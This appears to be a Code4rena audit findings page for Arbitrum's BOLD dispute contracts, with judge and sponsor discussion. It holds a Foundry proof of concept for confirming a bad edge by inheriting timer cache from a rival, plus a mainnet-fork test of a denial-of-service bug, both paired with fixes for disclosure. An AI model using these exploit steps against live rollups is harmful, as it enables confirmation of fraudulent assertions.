Platform: Code4rena
Start Date: 10/05/2024
Pot Size: $300,500 USDC
Total HM: 4
Participants: 27
Period: 17 days
Judge: Picodes
Total Solo HM: 1
Id: 375
League: ETH
Rank: 4/27
Findings: 3
Award: $20,529.36
🌟 Selected for report: 1
🚀 Solo Findings: 0
🌟 Selected for report: Kow
Also found by: Emmanuel, SpicyMeatball, xuwinnie
12737.1941 USDC - $12,737.19
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531 https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710
An attacker can exploit a vulnerability in the confirmation by time algorithm to confirm incorrect edges, leading to the confirmation of erroneous assertions.
There are two methods available for confirming an edge. Stakers can either bisect the edge until a one-step proof can be obtained and executed, or they can wait until the time threshold has been reached and confirm an unrivaled edge.
The confirmation by time algorithm involves two methods: updateTimerCacheByChildren
and updateTimerCacheByClaim
. These methods are responsible for updating the unrivaled time cache of edges in a chain.
/// @inheritdoc IEdgeChallengeManager function multiUpdateTimeCacheByChildren(bytes32[] calldata edgeIds) public { for (uint256 i = 0; i < edgeIds.length; i++) { (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeIds[i]); if (updated) emit TimerCacheUpdated(edgeIds[i], newValue); } } /// @inheritdoc IEdgeChallengeManager function updateTimerCacheByChildren(bytes32 edgeId) public { (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeId); if (updated) emit TimerCacheUpdated(edgeId, newValue); }
If the assertion has edges in multiple levels each of them must update their unrivaled time cache via updateTimerCacheByClaim
.
/// @inheritdoc IEdgeChallengeManager function updateTimerCacheByClaim(bytes32 edgeId, bytes32 claimingEdgeId) public { (bool updated, uint256 newValue) = store.updateTimerCacheByClaim(edgeId, claimingEdgeId, NUM_BIGSTEP_LEVEL); if (updated) emit TimerCacheUpdated(edgeId, newValue); }
The algorithm relies on accumulating enough unrivaled time to pass the confirmation threshold.
function confirmEdgeByTime( EdgeStore storage store, bytes32 edgeId, uint64 claimedAssertionUnrivaledBlocks, uint64 confirmationThresholdBlock ) internal returns (uint256) { if (!store.edges[edgeId].exists()) { revert EdgeNotExists(edgeId); } uint256 totalTimeUnrivaled = timeUnrivaledTotal(store, edgeId); totalTimeUnrivaled += claimedAssertionUnrivaledBlocks; >> if (totalTimeUnrivaled < confirmationThresholdBlock) { revert InsufficientConfirmationBlocks(totalTimeUnrivaled, confirmationThresholdBlock); } // we also check the edge is pending in setConfirmed() store.edges[edgeId].setConfirmed(); // also checks that no other rival has been confirmed setConfirmedRival(store, edgeId); return totalTimeUnrivaled; }
The issue arises in the updateTimerCacheByClaim
method, where a "bad" edge can inherit unrivaled time from a "good" edge. This occurs when the function adds the cached time of a lower level edge to the total unrivaled time of the current edge.
function updateTimerCacheByClaim( EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel ) internal returns (bool, uint256) { // calculate the time unrivaled without inheritance uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId); >> checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel); totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache; return updateTimerCache(store, edgeId, totalTimeUnrivaled); }
Let's take a closer look at checkClaimIdLink
:
function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel) private view { // we do some extra checks that edge being claimed is eligible to be claimed by the claiming edge // these shouldn't be necessary since it should be impossible to add layer zero edges that do not // satisfy the checks below, but we conduct these checks anyway for double safety // the origin id of an edge should be the mutual id of the edge in the level below if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) { revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId); } // the claiming edge must be exactly one level below if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) { revert EdgeLevelInvalid( edgeId, claimingEdgeId, nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel), store.edges[claimingEdgeId].level ); } }
The validation process ensures that the claimingEdge
is one layer below edgeId
and its originId
is equal to edgeId.mutualId()
. However, in the case of rival edges, all of them share the same originId
, which is equal to the mutualId
of the higher-level edge. This allows us to exploit the validation by passing a "bad" edgeId
, which will eventually pass the validation and enable us to inherit cached time from the "good" edge.
To exploit this vulnerability, an attacker can create a "bad" assertion and initiate a dispute between two edges, where one edge is "good" and the other is "bad". After some bisecting and the creation of edges at the new levels, the attacker stops responding, leading honest validators to believe that they can win the dispute by waiting for the confirmation threshold to pass.
Once the confirmation threshold has passed, the attacker, front-running the honest validator, executes a chain of time cache updates starting from the "good" edge. By accumulating time from the "good" edge, the attacker can confirm their "bad" edge and validate the erroneous assertion.
Coded POC for EdgeChallengeManager.t.sol
function testCanConfirmByClaimSubChallenge() public { EdgeInitData memory ei = deployAndInit(); ( bytes32[] memory blockStates1, bytes32[] memory blockStates2, BisectionChildren[6] memory blockEdges1, BisectionChildren[6] memory blockEdges2 ) = createBlockEdgesAndBisectToFork( CreateBlockEdgesBisectArgs( ei.challengeManager, ei.a1, ei.a2, ei.a1State, ei.a2State, false, a1RandomStates, a1RandomStatesExp, a2RandomStates, a2RandomStatesExp ) ); BisectionData memory bsbd = createMachineEdgesAndBisectToFork( CreateMachineEdgesBisectArgs( ei.challengeManager, 1, blockEdges1[0].lowerChildId, blockEdges2[0].lowerChildId, blockStates1[1], blockStates2[1], false, ArrayUtilsLib.slice(blockStates1, 0, 2), ArrayUtilsLib.slice(blockStates2, 0, 2) ) ); BisectionData memory ssbd = createMachineEdgesAndBisectToFork( CreateMachineEdgesBisectArgs( ei.challengeManager, 2, bsbd.edges1[0].lowerChildId, bsbd.edges2[0].lowerChildId, bsbd.states1[1], bsbd.states2[1], true, ArrayUtilsLib.slice(bsbd.states1, 0, 2), ArrayUtilsLib.slice(bsbd.states2, 0, 2) ) ); _safeVmRoll(block.number + challengePeriodBlock); BisectionChildren[] memory allWinners = concat(concat(toDynamic(ssbd.edges1), toDynamic(bsbd.edges1)), toDynamic(blockEdges1)); // Bad edges BisectionChildren[] memory allLoosers = concat(concat(toDynamic(ssbd.edges2), toDynamic(bsbd.edges2)), toDynamic(blockEdges2)); // Bad validator accumulates time for good edges ei.challengeManager.updateTimerCacheByChildren(allWinners[0].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[0].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[1].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[1].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[2].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[2].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[3].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[3].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[4].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[4].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allWinners[5].lowerChildId); // But when moving to another level he claims the timer cache for the bad edge ei.challengeManager.updateTimerCacheByClaim(allLoosers[6].lowerChildId, allWinners[5].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[6].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[11].lowerChildId); ei.challengeManager.updateTimerCacheByClaim(allLoosers[12].lowerChildId, allLoosers[11].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[12].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].upperChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].lowerChildId); ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].upperChildId); // Bad edge won the dispute by time ei.challengeManager.confirmEdgeByTime(allLoosers[17].lowerChildId, ei.a1Data); assertTrue( ei.challengeManager.getEdge(allLoosers[17].lowerChildId).status == EdgeStatus.Confirmed, "Edge confirmed" ); }
Foundry
One of the steps to prevent this vulnerability would be to validate the claimId
in the checkClaimIdLink
function.
function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel) private view { if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) { revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId); } // the claiming edge must be exactly one level below if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) { revert EdgeLevelInvalid( edgeId, claimingEdgeId, nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel), store.edges[claimingEdgeId].level ); } + // the claiming edge claimId must be the edgeId + if (store.edges[claimingEdgeId].claimId != edgeId) { + revert ClaimIdInvalid() + } }
Invalid Validation
#0 - c4-judge
2024-06-03T22:30:30Z
Picodes marked the issue as satisfactory
🌟 Selected for report: SpicyMeatball
Also found by: dontonka, josephdara
7792.1658 USDC - $7,792.17
An error in the BOLDUpgradeAction.sol
contract prevents it from upgrading and deploying new BOLD contracts.
The perform
function serves as the entry point in the BOLDUpgradeAction.sol
and is responsible for migrating stakers from the old rollup and deploying the challenge manager with a new rollup contract.
One of the first subroutines in this function is the cleanupOldRollup()
.
function perform(address[] memory validators) external { // tidy up the old rollup - pause it and refund stakes cleanupOldRollup();
This subroutine pauses the old rollup contract and attempts to refund existing stakers.
function cleanupOldRollup() private { IOldRollupAdmin(address(OLD_ROLLUP)).pause(); >> uint64 stakerCount = ROLLUP_READER.stakerCount(); // since we for-loop these stakers we set an arbitrary limit - we dont // expect any instances to have close to this number of stakers if (stakerCount > 50) { stakerCount = 50; } for (uint64 i = 0; i < stakerCount; i++) { >> address stakerAddr = ROLLUP_READER.getStakerAddress(i); OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr); if (staker.isStaked && staker.currentChallenge == 0) { address[] memory stakersToRefund = new address[](1); stakersToRefund[0] = stakerAddr; IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund); } } // upgrade the rollup to one that allows validators to withdraw even whilst paused DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER); }
This function contains a bug that prevents execution of the subsequent procedures. Let's check the forceRefundStaker
in the old rollup contract.
According to: https://docs.arbitrum.io/build-decentralized-apps/reference/useful-addresses
Proxy: https://etherscan.io/address/0x5eF0D09d1E6204141B4d37530808eD19f60FBa35 Implementation: https://etherscan.io/address/0x72f193d0f305f532c87a4b9d0a2f407a3f4f585f#code
RollupAdminLogic.sol
function forceRefundStaker(address[] calldata staker) external override whenPaused { require(staker.length > 0, "EMPTY_ARRAY"); for (uint256 i = 0; i < staker.length; i++) { require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL"); reduceStakeTo(staker[i], 0); >> turnIntoZombie(staker[i]); } emit OwnerFunctionCalled(22); }
RollupCore.sol
function turnIntoZombie(address stakerAddress) internal { Staker storage staker = _stakerMap[stakerAddress]; _zombies.push(Zombie(stakerAddress, staker.latestStakedNode)); >> deleteStaker(stakerAddress); } function deleteStaker(address stakerAddress) private { Staker storage staker = _stakerMap[stakerAddress]; require(staker.isStaked, "NOT_STAKED"); uint64 stakerIndex = staker.index; _stakerList[stakerIndex] = _stakerList[_stakerList.length - 1]; _stakerMap[_stakerList[stakerIndex]].index = stakerIndex; >> _stakerList.pop(); delete _stakerMap[stakerAddress]; }
From the above code, it is evident that the staker's address is eventually deleted from the _stakerList
, causing the array to shrink. As a result, the cleanupOldRollup
function will throw an "array out-of-bounds" error because it tries to iterate through an array with the original number of elements.
Coded POC, here we use mainnet fork with only the cleanupOldRollup
function.
// SPDX-License-Identifier: MIT pragma solidity 0.8.17; import {Test} from "forge-std/Test.sol"; import "forge-std/console.sol"; struct OldStaker { uint256 amountStaked; uint64 index; uint64 latestStakedNode; // currentChallenge is 0 if staker is not in a challenge uint64 currentChallenge; // 1. cannot have current challenge bool isStaked; // 2. must be staked } interface IOldRollup { function pause() external; function forceRefundStaker(address[] memory stacker) external; function getStakerAddress(uint64 stakerNum) external view returns (address); function stakerCount() external view returns (uint64); function getStaker(address staker) external view returns (OldStaker memory); } contract C4 is Test { IOldRollup oldRollup; address admin; function setUp() public { uint256 forkId = vm.createFork("https://rpc.ankr.com/eth"); vm.selectFork(forkId); oldRollup = IOldRollup(0x5eF0D09d1E6204141B4d37530808eD19f60FBa35); admin = 0x3ffFbAdAF827559da092217e474760E2b2c3CeDd; } function test_Cleanup() public { vm.startPrank(admin); oldRollup.pause(); uint64 stakerCount = oldRollup.stakerCount(); // since we for-loop these stakers we set an arbitrary limit - we dont // expect any instances to have close to this number of stakers if (stakerCount > 50) { stakerCount = 50; } for (uint64 i = 0; i < stakerCount; i++) { // FAILS with panic: array out-of-bounds access address stakerAddr = oldRollup.getStakerAddress(i); OldStaker memory staker = oldRollup.getStaker(stakerAddr); if (staker.isStaked && staker.currentChallenge == 0) { address[] memory stakersToRefund = new address[](1); stakersToRefund[0] = stakerAddr; oldRollup.forceRefundStaker(stakersToRefund); } } } }
Foundry
function cleanupOldRollup() private { IOldRollupAdmin(address(OLD_ROLLUP)).pause(); uint64 stakerCount = ROLLUP_READER.stakerCount(); // since we for-loop these stakers we set an arbitrary limit - we dont // expect any instances to have close to this number of stakers if (stakerCount > 50) { stakerCount = 50; } + for (uint64 i = 0; i < stakerCount;) { address stakerAddr = ROLLUP_READER.getStakerAddress(i); OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr); if (staker.isStaked && staker.currentChallenge == 0) { address[] memory stakersToRefund = new address[](1); stakersToRefund[0] = stakerAddr; IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund); + stakerCount -= 1; + } else { + i++; + } }
DoS
#0 - c4-sponsor
2024-05-31T19:07:39Z
godzillaba (sponsor) confirmed
#1 - gzeoneth
2024-06-03T16:21:21Z
#2 - c4-judge
2024-06-04T22:15:42Z
Picodes marked the issue as satisfactory
#3 - c4-judge
2024-06-04T22:18:57Z
Picodes marked the issue as selected for report
#4 - Picodes
2024-06-04T22:19:16Z
Keeping this report as best as the mitigation takes into account the if
condition
🌟 Selected for report: Sathish9098
Also found by: Audinarey, Dup1337, K42, KupiaSec, LessDupes, Rhaydden, SpicyMeatball, Takarez, ZanyBonzy, bronze_pickaxe, carlitox477, dontonka, forgebyola, fyamf, guhu95, hihen, josephdara, ladboy233, slvDev, twcctop, xuwinnie, zanderbyte
0 USDC - $0.00
If there is a wrong assertion created in the rollup contract, calling forceCreateAssertion
will not transfer "bad" assertion stake to the loserStakeEscrow
; instead, it will remain in the rollup contract forever.
The rollup contract assumes that there can only be one correct assertion. Therefore, it transfers all subsequent stakes into the loserStakeEscrow
since bad
assertion stakers cannot withdraw.
function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash) public onlyValidator whenNotPaused { ---SNIP--- if (!getAssertionStorage(newAssertionHash).isFirstChild) { // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion // only 1 of the children can be confirmed and get their stake refunded // so we send the other children's stake to the loserStakeEscrow // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck >> IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake); } }
However, in one case, this doesn't happen. Consider the following scenario:
forceCreateAssertion
to create a correct assertion and confirms it.function forceCreateAssertion( bytes32 prevAssertionHash, AssertionInputs calldata assertion, bytes32 expectedAssertionHash ) external override whenPaused { // To update the wasm module root in the case of a bug: // 0. pause the contract // 1. update the wasm module root in the contract // 2. update the config hash of the assertion after which you wish to use the new wasm module root (functionality not written yet) // 3. force refund the stake of the current leaf assertion(s) // 4. create a new assertion using the assertion with the updated config has as a prev // 5. force confirm it - this is necessary to set latestConfirmed on the correct line // 6. unpause the contract // Normally, a new assertion is created using its prev's confirmPeriodBlocks // in the case of a force create, we use the rollup's current confirmPeriodBlocks >> createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash); emit OwnerFunctionCalled(23); } function forceConfirmAssertion( bytes32 assertionHash, bytes32 parentAssertionHash, AssertionState calldata confirmState, bytes32 inboxAcc ) external override whenPaused { // this skip deadline, prev, challenge validations confirmAssertionInternal(assertionHash, parentAssertionHash, confirmState, inboxAcc); emit OwnerFunctionCalled(24); }
Note that the funds are not transferred to the escrow, even though it is a second child. The forceCreateAssertion
comments mention a force refund of the stakers, but Alice can't be refunded due to the requireInactiveStaker
condition. As a result, Alice's stake will be stuck in the rollup contract.
There is a function called fastConfirmNewAssertion
that is similar to the forceCreateAssertion
which includes the transfer of stake in case the new assertion is a second child.
function fastConfirmNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash) external whenNotPaused { ---SNIP--- if (status == AssertionStatus.NoAssertion) { // If not exists, we create the new assertion (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash); if (!getAssertionStorage(newAssertionHash).isFirstChild) { // only 1 of the children can be confirmed and get their stake refunded // so we send the other children's stake to the loserStakeEscrow // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck >> IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake); } }
Manual review
Consider transferring tokens to the loser escrow in the forceCreateAssertion
, like it's done in the fastConfirmNewAssertion
function.
function forceCreateAssertion( bytes32 prevAssertionHash, AssertionInputs calldata assertion, bytes32 expectedAssertionHash ) external override whenPaused { + (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash); + if (!getAssertionStorage(newAssertionHash).isFirstChild) { + IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake); + } emit OwnerFunctionCalled(23); }
Other
#0 - gzeoneth
2024-05-31T19:50:21Z
// 4. create a new assertion using the assertion with the updated config has as a prev
assertion with updated config
is referring to Alice's assertion (leaf assertion, without child); when this new assertion is created, Alice's assertion will became inactive as it now have a child.
There is a documentation error with step (3) and (4) inverted but have no impact to the protocol.
#1 - c4-judge
2024-06-05T09:03:21Z
Picodes marked the issue as unsatisfactory: Invalid
#2 - k4zanmalay
2024-06-05T20:12:43Z
In this report it is implied that Alice is the bad actor, so her assertion should never have a child. In the scenario, where we have a chain of good assertions, Alice creates an incorrect one:
Good--->Good--->Bad(Alice)
Then ForceCreateAssertion
is called:
Good--->Good--->Bad(Alice) \--->Good(Force created)
In this situation Alice's stake will be left in the rollup contract forever instead of being transferred to the escrow
#3 - xuwinnie
2024-06-06T00:19:17Z
Hey, I have some thoughts on this. There are two possibilities.
#4 - k4zanmalay
2024-06-06T06:23:06Z
Why do we need to confirm the bad assertion? The prev assertion has two children: Alice(bad), Force created(good), in all other cases like assertion creation by the validator/user and fastConfirmNewAssertion
, if the prev hash has one child assets are transferred into the escrow because there can only be one true assertion, see:
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L210-L216
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L288-L295
I see no reason why this shouldn't be implemented in the case of forceCreateAssertion
.
So in your case:
requireInactiveStaker
so we are safe#5 - xuwinnie
2024-06-06T06:27:34Z
Under normal circumstances we will never use this functionality. There must be either a soundness bug or completeness bug. As I have said, in possibility 1, implementing it will cause insolvency. Yes bad assertion should not be confirmed, but only when it IS confirmed will we call this function. Alice could have already withdrawed since the wrong assertion won the challenge. Otherwise we don't need to call forceconfirm in possibility 2, we should directly refund instead of sending to loserstakeescrow.
#6 - k4zanmalay
2024-06-06T06:35:14Z
Why are you implying that wrong assertion has won the challenge? It isn't, it just sits there :)
#7 - xuwinnie
2024-06-06T06:36:50Z
If it does not win, why do we need to call the admin function? The admin function is intended to used when a bug occurs. To put it simply, when we wish to call these admin functions, it's very likely that latestConfirmed contains bug, and we need to force switch to latestConfirmed's cousin. But latestConfirmed has already been confirmed (and potentially withdrawed), so we don't transfer once more.
#8 - k4zanmalay
2024-06-06T06:40:26Z
This may be another bug unrelated to Alice's assertion. Let's wait for comments from devs.
#9 - gzeoneth
2024-06-06T11:22:24Z
In this report it is implied that Alice is the bad actor, so her assertion should never have a child. In the scenario, where we have a chain of good assertions, Alice creates an incorrect one:
Good--->Good--->Bad(Alice)
Then
ForceCreateAssertion
is called:Good--->Good--->Bad(Alice) \--->Good(Force created)
In this situation Alice's stake will be left in the rollup contract forever instead of being transferred to the escrow
Typically, if Alice is malicious it should have at least 1 sibling assertion, e.g.
Good--->Good--->Bad(Alice) \--->Good(Bob, normally created)
When Bob is created, 1 stake would have been sent to the loser escrow and the stake invariant holds. Sure, it is possible for another bug such that Bob is not able to be created but the worst case here is Alice's malicious stake being temporarily stuck in the rollup contract, where the impact is quite low.
As with everything in RollupAdminLogic
, they are highly trusted admin actions and are known to be possible to break protocol invariants. In those scenario where there is a critical bug in the contract, there are no trivial handling of stake possible and we expect any inconsistent state to be resolved by a contract upgrade.
#10 - k4zanmalay
2024-06-06T12:11:38Z
@gzeoneth thanks for the clarification, but why does fastConfirmNewAssertion
(I think it is somewhat similar to forceCreateAssertion
except that anyTrustFastConfirmer
has less power than the rollup admin) send stakes to the escrow if there is a child in the parent hash?
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L288-L295
Why not implement the same mechanism in forceCreateAssertion
?
#11 - gzeoneth
2024-06-06T12:44:31Z
Correct, anyTrustFastConfirmer
have less power and fastConfirmNewAssertion
is expected to be called more frequently, where forceCreateAssertion
is not.
#12 - Picodes
2024-06-09T18:37:29Z
This report shows how when there is an emergency action by a highly privileged role, the handling of the stake is nontrivial. However, considering we are in a edge case were invariants don't hold, I don't think we can consider this a loss of funds or a broken functionality so QA severity seems more appropriate
#13 - c4-judge
2024-06-09T18:37:34Z
Picodes removed the grade
#14 - c4-judge
2024-06-09T18:37:39Z
Picodes changed the severity to QA (Quality Assurance)
#15 - DecentralDisco
2024-06-11T21:02:28Z
Noting that the 'grade-a' label was added on behalf of the judge after receiving confirmation.